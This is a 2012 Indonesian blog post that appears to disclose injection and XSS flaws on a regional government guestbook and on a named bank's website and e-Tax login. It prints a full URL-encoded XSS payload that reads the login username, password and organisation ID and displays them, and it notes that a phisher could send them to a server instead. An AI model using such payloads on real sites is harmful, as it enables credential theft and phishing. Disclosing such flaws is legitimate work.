Sabtu, 16 Juni 2012

Defaced Website and Why


                                                                               1. Website Kabupaten Sidoarjo

TML Injection

Celah pertama yang saya bahas ini pasti sudah sering Anda temui. Target exploitasi celah ini adalah layanan Buku Tamu sidoarjokab.go.id. Saya memasukkan code HTML berupa tag <h1> pada form Buku Tamu:
{image: Injeksi code HTML pada Buku Tamu}
Injeksi code HTML pada Buku Tamu
Hasilnya, input saya tidak disanitasi sehingga identitas dan komentar saya tampil dalam ukuran heading 1:
{image: Hasil Injeksi code HTML pada Buku Tamu}
Hasil Injeksi code HTML pada Buku Tamu
Saya kemudian mencoba memasukkan code JavaScript pada Buku Tamu:
{image: Injeksi code JavaScript pada Buku Tamu}
Injeksi code JavaScript pada Buku Tamu
Dan ternyata, code JavaScript saya dieksekusi:
{image: Hasil Injeksi code JavaScript pada Buku Tamu}
Hasil Injeksi code JavaScript pada Buku Tamu
Bisa Anda bayangkan jika ada orang jahat yang menanam code JavaScript berbahaya yang dapat mencuri informasi sensitif user (cookies, csrf, etc..) di halaman ini. Dari sini kita bisa melihat adanya 2 celah keamanan pada Buku Tamu:
  1. Tidak ada captha untuk melindungi buku tamu dari SPAMMER;
  2. Tidak adanya sanitasi input dan output untuk mencegah orang jahat menginjeksikan malicious script;

//E.O.F

3. Website OSBC
Tidak bisa dipungkiri lagi dan telah berulang kali terbukti bahwa Website Bank yang memiliki celah XSS sangat rawan untuk menjadi target penipuan. Senin pagi kemarin saya mendapati 2 celah XSS pada portal Bank OCBC NISP, yaitu pada website utama dan pada aplikasi e-Tax OCBC NISP.

XSS Pada OCBCNISP-DOT-COM

POC:

Search Engine:
Pencarian ATM:

Hasil:

{image: Bank OCBC NISP Website Vulnerable to XSS}
Bank OCBC NISP Website Vulnerable to XSS

XSS Pada Aplikasi e-Tax

POC:
1http://etax.ocbcnisp.com/module.asp?module=1&amp;error=%3C/div%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20height=%2269%22%20colspan=%222%22%3E%3Cdiv%20align=%22center%22%3E%3Cinput%20name=%22Login%22%20type=%22button%22%20%20value=%22Login%22%20onClick=%22alert%28%27Info%20dari%20form%20Login%5Cn--------------------------------------------%5CnUsername:%20%27%2Bdocument.getElementsByName%28%27UserID%27%29[0].value%2B%27%5CnPassword:%20%27%2Bdocument.getElementsByName%28%27Password%27%29[0].value%2B%27%5CnOrganisation%20ID:%20%27%2Bdocument.getElementsByName%28%27orid%27%29[0].value%2B%27%5Cn%5CnInfo%20diatas%20telah%20terkirim%20ke%20server%20WWW.SPYROZONE.NET%27%29;%22%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/form%3E%3C/div%3E%3Cnoscript%3E
Hasil:
Isikan username, password & ID organisani, kemudian klik tombol [Login].
{image: Celah XSS Pada Aplikasi e-Tax OCBC NISP}
Celah XSS Pada Aplikasi e-tax OCBC NISP
Melalui XSS, saya mengganti tombol submit form menjadi tombol yang akan mengambil data pada form, lalu menampilkannya di layar.
{image: Data korban dikirim ke server lain}
Data korban dikirim ke server lain
Phisher bisa mengganti fungsi saya menjadi fungsi untuk mengirimkan data-data tersebut ke servernya untuk menampung username dan password korban.

Oleh Spyro.net

0 comments: